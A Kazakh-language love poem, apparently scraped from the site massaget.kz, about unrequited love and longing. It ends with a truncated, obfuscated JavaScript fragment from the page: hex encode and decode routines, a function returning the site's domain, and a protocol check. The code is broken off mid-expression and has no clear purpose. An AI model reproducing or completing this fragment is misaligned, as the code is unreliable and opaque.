Сенi сүйем!!!


Сен аққу құс жүректе мекендеген,
Сені ойлап түндерде көз ілмегем!
Сені ғана қалаған бұл жүрекке-
Сен жоқ жерде жылылық сезiлмеген.

Бір соғады бұл жүрек озіңменен,
Баурап алдың жүректі дүрсілдеген.
Әркезде де қиналып, мұңға баттым
Алыстаған сәттерде жүрек сеннен.

Тусінбеймін не озі сезім деген,
Киындық па? Бақыт па көз көрмеген?!
Қаншама рет тырыссамда се3ім атты,
Шыға алмадым ,әйтеуiр, көлеңкеден!

Сезім оты жүректі күйдіргенмен,
Суймейсін-ау, білемін мен суйгенмен.
Мен озіне айталмай жан сырымды
Сені ойлап сырластым жалғыз түнмен!

Мұң қалды ма жанымды жүдетпеген,
Қиналғанда жүректі жұбатты өлең!
Мені мүлде елемей сен келесің,
Сондадағы тек қана сені сүйем!

Сені ойламай ешбір түнім өтпеген,
Армандадым бақытты күнді көптеген.
Сезімімменен котеріп келдім берілмей,
Тағдырдың мынау қиындыктарын жүктеген!

Мен озінді шынайы ұнатып ем,
Тек сенімен көңілді жұбатып ем!
Мұндар мені женгендей бола берді,
Сен жанымнан, мінекей, алыстап ең!

Не қалайды білмеймін өмір меннен,
Керек болса алсыншы жаным берем!
Онсызда алды емес пе жүрегімді,
Алыстатып жаным-ау сені меннен!

Аямады бұл өмір мұңды меннен,
Жүректі қинай берді сені сүйген.
Сені сүйген алі де журегіме,
Сезімімді сақтап жүрмін – сен сезбеген.

Қинай берсін, жүректі қинай берсін,
Өкпелеп мұң шақпаймын өмірге мен!
Мені мүлде жолатпа жүрегіңе – 
Барі бірде жалғыз-ақ сені сүйем!!!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e



Бөлісу: